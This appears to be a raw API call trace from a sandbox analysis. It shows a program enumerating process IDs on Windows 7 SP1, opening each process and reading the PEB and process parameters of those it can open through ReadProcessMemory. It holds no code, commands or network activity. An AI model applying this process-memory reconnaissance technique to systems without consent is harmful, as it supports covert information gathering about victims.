[0572.559] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="272") returned 3
[0572.559] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.559] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.571] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x110) returned 0x0
[0572.571] CloseHandle (hObject=0x0) returned 0
[0572.571] _ui64tow (_Value=0x15c, _Buffer="272", _Radix=10) returned="348"
[0572.573] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="348") returned 3
[0572.574] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.574] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.584] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x0
[0572.584] CloseHandle (hObject=0x0) returned 0
[0572.585] _ui64tow (_Value=0x180, _Buffer="348", _Radix=10) returned="384"
[0572.587] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="384") returned 3
[0572.587] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.587] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.601] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0
[0572.601] CloseHandle (hObject=0x0) returned 0
[0572.601] _ui64tow (_Value=0x18c, _Buffer="384", _Radix=10) returned="396"
[0572.603] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="396") returned 3
[0572.604] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.604] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.615] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
[0572.615] CloseHandle (hObject=0x0) returned 0
[0572.615] _ui64tow (_Value=0x1b4, _Buffer="396", _Radix=10) returned="436"
[0572.617] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="436") returned 3
[0572.618] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.618] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.628] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b4) returned 0x0
[0572.629] CloseHandle (hObject=0x0) returned 0
[0572.629] _ui64tow (_Value=0x1d0, _Buffer="436", _Radix=10) returned="464"
[0572.631] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="464") returned 3
[0572.631] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.632] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.658] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0
[0572.659] CloseHandle (hObject=0x0) returned 0
[0572.660] _ui64tow (_Value=0x1dc, _Buffer="464", _Radix=10) returned="476"
[0572.664] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="476") returned 3
[0572.665] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.665] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.685] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0
[0572.685] CloseHandle (hObject=0x0) returned 0
[0572.686] _ui64tow (_Value=0x1e4, _Buffer="476", _Radix=10) returned="484"
[0572.688] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="484") returned 3
[0572.689] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.689] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.703] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0
[0572.703] CloseHandle (hObject=0x0) returned 0
[0572.704] _ui64tow (_Value=0x260, _Buffer="484", _Radix=10) returned="608"
[0572.706] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="608") returned 3
[0572.707] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.707] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.723] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x260) returned 0x0
[0572.723] CloseHandle (hObject=0x0) returned 0
[0572.725] _ui64tow (_Value=0x2a0, _Buffer="608", _Radix=10) returned="672"
[0572.732] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="672") returned 3
[0572.736] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.736] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.757] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a0) returned 0x0
[0572.757] CloseHandle (hObject=0x0) returned 0
[0572.757] _ui64tow (_Value=0x2d0, _Buffer="672", _Radix=10) returned="720"
[0572.761] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="720") returned 3
[0572.762] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.762] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.777] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d0) returned 0x0
[0572.777] CloseHandle (hObject=0x0) returned 0
[0572.777] _ui64tow (_Value=0x348, _Buffer="720", _Radix=10) returned="840"
[0572.780] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="840") returned 3
[0572.781] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.781] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.793] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x348) returned 0x0
[0572.793] CloseHandle (hObject=0x0) returned 0
[0572.794] _ui64tow (_Value=0x370, _Buffer="840", _Radix=10) returned="880"
[0572.796] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="880") returned 3
[0572.796] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.796] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.806] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0
[0572.806] CloseHandle (hObject=0x0) returned 0
[0572.807] _ui64tow (_Value=0x3ac, _Buffer="880", _Radix=10) returned="940"
[0572.809] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="940") returned 3
[0572.810] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.810] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0
[0572.822] CloseHandle (hObject=0x0) returned 0
[0572.822] _ui64tow (_Value=0x120, _Buffer="940", _Radix=10) returned="288"
[0572.824] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="288") returned 3
[0572.825] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.825] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.836] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x120) returned 0x0
[0572.836] CloseHandle (hObject=0x0) returned 0
[0572.836] _ui64tow (_Value=0x164, _Buffer="288", _Radix=10) returned="356"
[0572.838] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="356") returned 3
[0572.839] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.840] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.851] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x164) returned 0x1f4
[0572.851] GetLastError () returned 0x0
[0572.851] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0572.851] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd6018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.851] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0572.851] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2227f0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0572.851] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x222688, lpBuffer=0xced2a0, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0572.852] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0572.852] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0572.852] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd6020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.852] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x221e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0572.853] malloc (_Size=0x3e) returned 0x3ed180
[0572.853] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2226c0, lpBuffer=0x3ed180, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3ed180*, lpNumberOfBytesRead=0x0) returned 1
[0572.853] free (_Block=0x3ed180)
[0572.854] CloseHandle (hObject=0x1f4) returned 1
[0572.854] _ui64tow (_Value=0x420, _Buffer="356", _Radix=10) returned="1056"
[0572.857] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1056") returned 4
[0572.857] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.857] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x420) returned 0x0
[0572.872] CloseHandle (hObject=0x0) returned 0
[0572.872] _ui64tow (_Value=0x484, _Buffer="1056", _Radix=10) returned="1156"
[0572.875] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1156") returned 4
[0572.876] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.876] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.892] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x484) returned 0x0
[0572.892] CloseHandle (hObject=0x0) returned 0
[0572.893] _ui64tow (_Value=0x4a4, _Buffer="1156", _Radix=10) returned="1188"
[0572.896] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1188") returned 4
[0572.897] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.897] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.910] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a4) returned 0x1f4
[0572.910] GetLastError () returned 0x0
[0572.910] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0572.910] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffde018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.910] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0572.910] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2a27c0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0572.910] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2a2688, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0572.911] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0572.911] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0572.911] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffde020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.911] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2a1e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0572.912] malloc (_Size=0x20) returned 0x3efdb0
[0572.912] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2a26ca, lpBuffer=0x3efdb0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3efdb0*, lpNumberOfBytesRead=0x0) returned 1
[0572.912] free (_Block=0x3efdb0)
[0572.913] CloseHandle (hObject=0x1f4) returned 1
[0572.913] _ui64tow (_Value=0x4bc, _Buffer="1188", _Radix=10) returned="1212"
[0572.915] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1212") returned 4
[0572.916] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.916] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.928] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0
[0572.928] CloseHandle (hObject=0x0) returned 0
[0572.929] _ui64tow (_Value=0x4fc, _Buffer="1212", _Radix=10) returned="1276"
[0572.931] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1276") returned 4
[0572.932] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.932] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.955] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x1f4
[0572.955] GetLastError () returned 0x0
[0572.955] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0572.955] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd9018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.955] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0572.956] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2728b0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0572.956] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x272688, lpBuffer=0xced2a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0572.956] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0572.957] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0572.957] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd9020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.957] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x271e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0572.957] malloc (_Size=0x116) returned 0x3f1710
[0572.957] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2726c8, lpBuffer=0x3f1710, nSize=0x114, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3f1710*, lpNumberOfBytesRead=0x0) returned 1
[0572.958] free (_Block=0x3f1710)
[0572.958] CloseHandle (hObject=0x1f4) returned 1
[0572.959] _ui64tow (_Value=0x640, _Buffer="1276", _Radix=10) returned="1600"
[0572.961] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1600") returned 4
